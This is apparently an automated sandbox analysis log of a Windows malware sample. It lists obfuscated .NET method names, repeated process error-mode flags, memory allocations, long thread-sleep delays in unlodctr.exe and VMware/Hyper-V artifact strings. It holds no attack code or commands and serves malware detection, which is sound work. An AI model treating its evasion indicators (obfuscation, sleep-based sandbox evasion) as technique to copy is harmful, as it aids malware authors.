Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, p4rJXkYNJEZH3sNfrC.cs	High entropy of concatenated method names: 'eX5gMpkFua', 'fpcgs7RSp5', 'K14DHelrjR', 'kCDDAIgdMa', 'btLgSPpaWs', 'PQTgE3fJis', 'Mn1gQRxJw6', 'fONgFHR9tj', 'xAOgC7rsku', 'a9UgOg2hDV'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, BCyoJXEIOZ4GECBlCi.cs	High entropy of concatenated method names: 'glhKDwUhX', 'yYikfpLvm', 'OEMmjogXT', 'OmS2vrUlf', 'zIayk0y43', 'uKjjrJUeT', 'bdEntMocZ0vCq17bsl', 'uHqB12sXGypo8paoI1', 'CJaD8i08t', 'vxyThfYeK'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, sPVqVka94VBXoB2vT2.cs	High entropy of concatenated method names: 'Ndp7kTLvqU', 'aJx7mMK9J8', 'oBR7nANflA', 'pnB7ylAjts', 'd7d7Z5kcLg', 'cB27IUnGAj', 'GtJ7gLhUha', 'hfg7Dd8aHu', 'sj47h9yfsG', 'bWS7TXdFp2'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, zC5UCdSIWB58FHCwfw.cs	High entropy of concatenated method names: 'oIVGFxwUkH', 'OGiGCZ12Ys', 'EUbGOumJ5U', 'XjEGukc6rh', 'mZRG6X5dQB', 'H9XG9SDwkU', 'S54GxlVh8g', 'gG0GMShe1D', 'DowGNuTk6G', 'iHrGsSUr4C'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, HVjjmekMbjAZlbxgGq.cs	High entropy of concatenated method names: 'UhyqiNXK7r', 'SV1qLa4FtW', 'VZCqGHgIxv', 'CYMq7fhdUG', 'mxRq4hqeaB', 'z53qP3Md4u', 'zhNqtM42nT', 'VRXqpDlqFU', 'bmQqaLikRh', 'ocUqXPIv2i'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, tZuNUMUPuAev4JtZdP.cs	High entropy of concatenated method names: 'Dispose', 'ehlANqn9WF', 'nU2U8iIroF', 'SIkooF9w6Z', 'eHtAsu7YFr', 'kvkAz34Amq', 'ProcessDialogKey', 'WC6UHbhKoN', 'XeHUAsY45B', 'YgVUUJn4e5'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, gulYAEF1lpKXr3abli.cs	High entropy of concatenated method names: 'tllhAZsGPI', 'WNjhqLuQsL', 'Ee1hd9jY9w', 'bnbhLRt6pP', 'pY5hGshFay', 'Dsyh4aNOTe', 'PA3hPqu7Ed', 'cjFDxPYQ5X', 'xhtDMTUNU8', 'LtuDNH582C'
Source: 0.2.UQO06iOMKZMPZ4A.exe.42beec0.10.raw.unpack, CMAx61hH1leVOQ1R5H.cs	High entropy of concatenated method names: 'MMttL6SodZ', 'kjSt7EkjAM', 'egNtPheDq1', 'DGCPsochZR', 'h62PzfHeRy', 'KWstHdrMA5', 'htytA8LGsE', 'lmstU928RI', 'CZgtqedcmJ', 'zPRtd5EB7P'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, qptXq8PWUia3WCyO6SM.cs	High entropy of concatenated method names: 'iZVh14SPsy', 'wKWhrhgwyi', 'e9shKJ7Ft2', 'mPWhkaKfm9', 'UAuhwsJTCd', 'lJXhmyMqAA', 'NAAh2I1ZrX', 'jBHhnPL8r3', 'Dpnhy2jwSt', 'gf1hjlK8v0'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, GPsQBkJQEtPsywAcW2.cs	High entropy of concatenated method names: 'N3Pt1YlieD', 'VDEtreMu0f', 'bBxtK7U18B', 'Jkxtk58Uft', 'xeWtw9nVBg', 'dXatmmtM6D', 'Pift2IPtQo', 'rqDtnS3gh7', 'N8ityFxkcs', 'NVXtjvOX4y'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, nkZ8Q7fo3nyGU5LAd5.cs	High entropy of concatenated method names: 'YF54wUU6OI', 'Amw42a1NQK', 'ENa7BkZIZB', 'DPV7vwYAE9', 'FrP7lCGTxG', 'F4P7YJ10xE', 'i5e7b94YKR', 'Etx7c0vEyd', 'gQq7VFp68G', 'Ar17R4TDwP'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, kvf1IuVxYoZ5QcBZZe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XL8UNOwgIP', 'XHaUsStaI4', 'jeYUzhl892', 'mb1qHbmoIT', 'UKLqAVDtim', 'TR1qUoT9Bk', 'h6ZqqOgLPB', 'k1yKSx9IvdJBr9gFPHf'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, UCqtaR63XKApAH92bb.cs	High entropy of concatenated method names: 'nGDDWOeSlm', 'vRsD8ZXtOj', 'ENoDBLEEgS', 'M2LDvoLrmm', 'fnYDFAR04a', 'oFkDlJdTi5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, svJmV5t0w42ZlET6y8.cs	High entropy of concatenated method names: 'KEKAt1lT6F', 'e8fApOcxgV', 'hHjAXDHIOC', 'd3xAeVkYZR', 'TBsAZg8KuD', 'iHGAIjxvXy', 'S8QqO8fcbwAJpRwCUw', 'LQM8ivg3GqtyqdcSBF', 'mxCAArp0CL', 'TeLAqesYEq'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, y6RaThAKsVSgwbeLa4.cs	High entropy of concatenated method names: 'KM7DLx5bmW', 'GWQDGRKcdl', 'BecD7a2srX', 'JArD4il8Ki', 'U8FDPdlE80', 'HMVDtnTde3', 'rbUDp66WBP', 'UIXDaR2QVq', 'QI6DXCmyrI', 'NYvDef7SW0'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, Sc1JklPb2V7Xqa8ma4n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BNKTFC8rxA', 'gGlTCLXl62', 'pR1TOhxyfW', 'HoVTu0waf2', 'zN5T6tqQuu', 'FAST9sTPgX', 'SWOTx4ttsJ'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, fJuHmJ0x7LMON7NNbc.cs	High entropy of concatenated method names: 'ToString', 'VejISJKsjL', 'zJNI84iDyA', 'NjkIBYc7N7', 'dFaIvXOO7e', 'Iw0IljldkU', 'VPLIYilLEk', 'vDGIbMmH0x', 'hJDIcZcTMJ', 'vPZIVLiHR2'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, H6nVeouWPrn8PxjkOt.cs	High entropy of concatenated method names: 'i1UPiigsWJ', 'bxsPGPLKmN', 'THXP4PXc4G', 'rkhPtCic1d', 'wDlPpnObLe', 'B2O469vipq', 'gog49DkPK7', 'YFr4xvyQlq', 'jXk4MHkx9h', 'jya4NjD6IN'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, uGMU2PHYPmCtC47oV2.cs	High entropy of concatenated method names: 'GVg5nSl1ED', 'dkE5yXq4oa', 'Ynr5W44Fx6', 'nUp58vGXQe', 'Tln5vawiqB', 'Car5ltECCm', 'MVM5bE93yJ', 'jXN5crQNCa', 'QYs5RmUcKy', 'Unm5S8CnJx'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, p4rJXkYNJEZH3sNfrC.cs	High entropy of concatenated method names: 'eX5gMpkFua', 'fpcgs7RSp5', 'K14DHelrjR', 'kCDDAIgdMa', 'btLgSPpaWs', 'PQTgE3fJis', 'Mn1gQRxJw6', 'fONgFHR9tj', 'xAOgC7rsku', 'a9UgOg2hDV'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, BCyoJXEIOZ4GECBlCi.cs	High entropy of concatenated method names: 'glhKDwUhX', 'yYikfpLvm', 'OEMmjogXT', 'OmS2vrUlf', 'zIayk0y43', 'uKjjrJUeT', 'bdEntMocZ0vCq17bsl', 'uHqB12sXGypo8paoI1', 'CJaD8i08t', 'vxyThfYeK'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, sPVqVka94VBXoB2vT2.cs	High entropy of concatenated method names: 'Ndp7kTLvqU', 'aJx7mMK9J8', 'oBR7nANflA', 'pnB7ylAjts', 'd7d7Z5kcLg', 'cB27IUnGAj', 'GtJ7gLhUha', 'hfg7Dd8aHu', 'sj47h9yfsG', 'bWS7TXdFp2'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, zC5UCdSIWB58FHCwfw.cs	High entropy of concatenated method names: 'oIVGFxwUkH', 'OGiGCZ12Ys', 'EUbGOumJ5U', 'XjEGukc6rh', 'mZRG6X5dQB', 'H9XG9SDwkU', 'S54GxlVh8g', 'gG0GMShe1D', 'DowGNuTk6G', 'iHrGsSUr4C'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, HVjjmekMbjAZlbxgGq.cs	High entropy of concatenated method names: 'UhyqiNXK7r', 'SV1qLa4FtW', 'VZCqGHgIxv', 'CYMq7fhdUG', 'mxRq4hqeaB', 'z53qP3Md4u', 'zhNqtM42nT', 'VRXqpDlqFU', 'bmQqaLikRh', 'ocUqXPIv2i'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, tZuNUMUPuAev4JtZdP.cs	High entropy of concatenated method names: 'Dispose', 'ehlANqn9WF', 'nU2U8iIroF', 'SIkooF9w6Z', 'eHtAsu7YFr', 'kvkAz34Amq', 'ProcessDialogKey', 'WC6UHbhKoN', 'XeHUAsY45B', 'YgVUUJn4e5'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, gulYAEF1lpKXr3abli.cs	High entropy of concatenated method names: 'tllhAZsGPI', 'WNjhqLuQsL', 'Ee1hd9jY9w', 'bnbhLRt6pP', 'pY5hGshFay', 'Dsyh4aNOTe', 'PA3hPqu7Ed', 'cjFDxPYQ5X', 'xhtDMTUNU8', 'LtuDNH582C'
Source: 0.2.UQO06iOMKZMPZ4A.exe.98a0000.11.raw.unpack, CMAx61hH1leVOQ1R5H.cs	High entropy of concatenated method names: 'MMttL6SodZ', 'kjSt7EkjAM', 'egNtPheDq1', 'DGCPsochZR', 'h62PzfHeRy', 'KWstHdrMA5', 'htytA8LGsE', 'lmstU928RI', 'CZgtqedcmJ', 'zPRtd5EB7P'
Source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.UQO06iOMKZMPZ4A.exe.25a0000.1.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 2620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 2550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 4C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 5C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 5D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 6D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: AD30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: BD30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: C1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: D1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: E1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: F1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Memory allocated: 101C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\unlodctr.exe	Window / User API: threadDelayed 5003			Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Window / User API: threadDelayed 4970			Jump to behavior

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unlodctr.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7380	Thread sleep count: 5003 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7380	Thread sleep time: -10006000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7380	Thread sleep count: 4970 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 7380	Thread sleep time: -9940000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\unlodctr.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000334E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: firefox.exe, 0000000D.00000002.2358890865.000002B991F6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluuB
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000002.2873069283.00000000011AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
